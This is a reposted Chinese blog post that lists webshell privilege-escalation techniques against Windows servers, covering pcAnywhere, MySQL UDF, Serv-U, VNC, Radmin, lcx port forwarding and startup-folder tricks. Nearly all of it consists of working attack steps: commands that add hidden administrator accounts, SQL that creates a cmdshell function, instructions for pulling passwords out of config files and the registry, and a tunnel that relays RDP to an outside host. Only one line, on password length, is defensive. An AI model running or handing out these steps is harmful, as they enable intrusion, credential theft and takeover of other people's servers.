pcAnywhere提權(quán)：
1.利用pcAnywhere提權(quán)，前提條件是pcAnywhere默認(rèn)安裝到默認(rèn)路徑，以及它的目錄安全權(quán)限有users權(quán)限,如果管理員刪除了users和power users用戶的目錄權(quán)限，只剩下administer和system用戶目錄權(quán)限，則無(wú)法提權(quán)；
2.在webshll的大馬中查找到pcanywhere目錄里的host目錄，里面的cif文件保存了連接pcanywhere的賬戶和密碼，然后下載下來(lái)，通過(guò)PcAnywhere密碼破解工具進(jìn)行破解密碼，然后再自己的電腦上安裝pcanywhere，然后通過(guò)連接到另一臺(tái)電腦進(jìn)行遠(yuǎn)程桌面連接；
——————————–
利用HASH破解提權(quán)：
1.工具：ophcrack-win32-installer-3.3.0（hash破解軟件） ，Pwdump7（查看hash的軟件），彩虹表（密碼字典）
2.思路：滲透，管理員可能幾臺(tái)服務(wù)器都實(shí)用同個(gè)密碼，我們獲取其他一個(gè)以后可以嘗試登陸
其他服務(wù)器
3.例如添加一個(gè)用戶并將該用戶添加到管理員組：net user backlion 123456 /add
net localgroup administrators backlion /add
4.在dos下用pwdump7運(yùn)行查看該用戶的hash值：backlion:1003:2FB6717FC6897581AAD3B435B51404EE:DA0492D72F8D04983188CCD4CA257E44:::
5.然后通過(guò)ophcrack和彩虹表進(jìn)行破解該用戶
6.防范：密碼超過(guò)14位就不能破解，建議密碼設(shè)置15位，越復(fù)雜越好

————————————————
MYSQL提權(quán)(udf.dll)：
1.用的文件有su.php木馬，Linx Mysql BackDoor.php木馬
1.udf.dll的默認(rèn)路徑：C:\Winnt\udf.dll（win2000系統(tǒng)），C:\Windows\udf.dll （win2003系統(tǒng)）
2.找到網(wǎng)站目錄mysql配置文件，常用的有：config.php,web.php,webconfig.php
配置文件如下：
$dbhost = ‘localhost’; // 數(shù)據(jù)庫(kù)服務(wù)器 就是127.0.0.1
$dbuser = ‘root’; // 數(shù)據(jù)庫(kù)用戶名
$dbpw = ‘a(chǎn)’; // 數(shù)據(jù)庫(kù)密碼
$dbname = ‘dz’; // 數(shù)據(jù)庫(kù)名
3.在su.php中，填入host:127.0.0.1 user:root passwor:a db:mysql,然后輸入sql命令進(jìn)行添加用戶：select state(“net user backlion 123 /add & net localgroup administrators backlion /add”)
然后通過(guò)net user查看是否添加成功
4.在udf.ph 中host:127.0.0.1 user:root passwor:a db:mysql，然后填入DLL導(dǎo)出路徑：C:\Windows\udf.dll ,在sql命令中輸入一下命令：
create function cmdshell returns string soname ‘udf.dll’//添加一個(gè)udf.dll組件函數(shù)
select cmdshell(‘net user backlion$ 123456 /add’); //添加一個(gè)用戶
select cmdshell(‘net localgroup administrators backlion$ /add’); //將用戶添加到管理員組
select cmdshell(‘c:\3389.exe’); //這個(gè)是把開(kāi)3389的文件放到C盤(pán)，然后運(yùn)行
drop function cmdshell; //刪除函數(shù)
select cmdshell(‘netstat -an’); //這是查看端口查開(kāi)放情況
———————————————————————-
Churrasco提權(quán)：
1.用到的工具有：win2003 0day漏洞工具03.exe和cmd.exe；
2.然后在webshell中上傳我們的03.exe和cmd.exe到可以讀寫(xiě)的目錄中，然后切換到可讀寫(xiě)的目錄中：然后在webshll路徑中填入我們的cmd.exe路徑如;c :/recyle/cmd.exe 下面填入：c :/recyle/03.exe “net user backlion 123 /add & net localgroup adminstrators backlion /add”
————————————————————————————–
利用sogou輸入法（6.0）提權(quán)：
1.sogou輸入法是6.0版本，然后我們通過(guò)webshll木馬管理，查找到sogou安裝的路徑，然后通過(guò)上傳
ImeUtil.exe 替換原來(lái)的ImeUtil.exe文件，只要一加載這個(gè)程序就會(huì)在系統(tǒng)中自動(dòng)添加管理員
用戶名：sunwear 密碼：sunwear
————————————————————
lcx內(nèi)網(wǎng)端口轉(zhuǎn)化，解決在內(nèi)網(wǎng)不能遠(yuǎn)程桌面登錄：
1.webshll目標(biāo)站點(diǎn)的wscript組件開(kāi)啟，并且有一個(gè)可讀寫(xiě)的目錄，一般上傳到c:/recyle目錄下
2.上傳我們的cmd.exe和lcx.exe上去
3.然后在shll路徑中填入：c:/recyle/cmd.exe 下面就輸入c:/recyle/lcx.exe slave 202.12.13.2 51 127.0.0.1 3389
4.在本地DOS下輸入： d:/lcx.exe listen 51 3333 監(jiān)聽(tīng)51并轉(zhuǎn)發(fā)到3333端口
4.在本地遠(yuǎn)程桌面里面輸入:127.0.0.1:3333
———————————————
6Gftp提權(quán)：
1.默認(rèn)安裝目錄C:\Program Files\Gene6 FTP Server
2.密碼保存文件的路徑是在C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini
其配置文件如下：
[Server]
IP=127.0.0.1,8021\r\n //使用的端口號(hào)
GrantAllAccessToLocalHost=0
[Acct=Administrator] //用戶名
Enabled=1
Rights=0
Password=21232F297A57A5A743894A0E4A801FC3 //md5密碼

3.在webshll中發(fā)現(xiàn)了有安裝g6ftp軟件，默認(rèn)安裝路徑
4.在shll中輸入：C:\recycler\lcx.exe -tran 8022 127.0.0.1 8021
6.在本地安裝6gftp軟件，IP地址輸入：目標(biāo)站點(diǎn)IP地址。端口號(hào)為8022，用戶名為administrator,密碼為破解出來(lái)的md5值；
——————————————–
Serv-U6.4提權(quán)：
1.serv-u的密鑰：9dK4g4iPhvOsoEY9nprEiSsmW7OUqFaGuwHT1CtBn9K6hQVg0bd2okQ9ldel+1IGE9b4xDP0q2W+vE4vgZLA7unm6t3CxTI
2.在serv-u中下面的命令中輸入：cmd /c net user backlion$ 123 /add & net localgroup administrators backlion$ /add
3.然后就添加了一個(gè)用戶名
4.就可以用這個(gè)賬號(hào)遠(yuǎn)程桌面登錄了；
—————————————————-
VNC密碼的破解和提權(quán)：
1在webshll中讀取vnc注冊(cè)表鍵值：RealVNC的注冊(cè)表路徑：
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\Password
UltraVNC的注冊(cè)表路徑：
HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\password
讀取的是十進(jìn)制數(shù)，需要轉(zhuǎn)換成十六進(jìn)制如下：
十六進(jìn)制：D7 51 CC 73 31 24 7A 93
十進(jìn)制： 12 7C EF FA 6E 0B 7A D9
3.破解vnc密碼：vncpwdump.exe D751CC7331247A93
4.然后在本地安裝一個(gè)VNC客戶端，進(jìn)行遠(yuǎn)程連接
—————————————————————-
Radmin提權(quán)：
1.在webshll中檢查出有安裝Radmin程序；
2.在讀取Radmin注冊(cè)表鍵值，然后把讀取的十進(jìn)制轉(zhuǎn)換成16進(jìn)制；
3.直接用radmi-hash工具連接，把讀取的十六進(jìn)制填入進(jìn)去；
4.最后可以用radmin客戶端連接就行了；
————————————————–
360安全衛(wèi)士提權(quán)：
1.上傳我們的cmd.exe和360.exe到可讀寫(xiě)的目錄下如：c:/recyle
2.在shell中輸入：c:/recyle/cmd.exe 然后在下面輸入：c:/recyle/360.exe sethc
3.然后遠(yuǎn)程桌面登錄輸入目標(biāo)IP地址，過(guò)一會(huì)就彈出了一個(gè)DOS窗口，然后就可以添加用戶名和密碼
———————————————————————————
啟動(dòng)項(xiàng)提取：
1.在webshll中上傳一個(gè)添加用戶的批處理文件如：net user backlion$ 123456 /add & net localgroup adminsitrators backlion$ /add
爆出為系統(tǒng)修復(fù).bat;
2.然后在wegshll中輸入啟動(dòng)選的路徑：C:\Documents and Settings\Administrator\「開(kāi)始」菜單\程序\啟動(dòng) 上傳我們的批處理文件；
3.只要管理員下次重新啟動(dòng)機(jī)子，就能自動(dòng)添加我們的賬號(hào)；

轉(zhuǎn)載于:https://www.cnblogs.com/milantgh/p/3601826.html

總結(jié)

以上是生活随笔為你收集整理的常用webshell提权方法总结的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。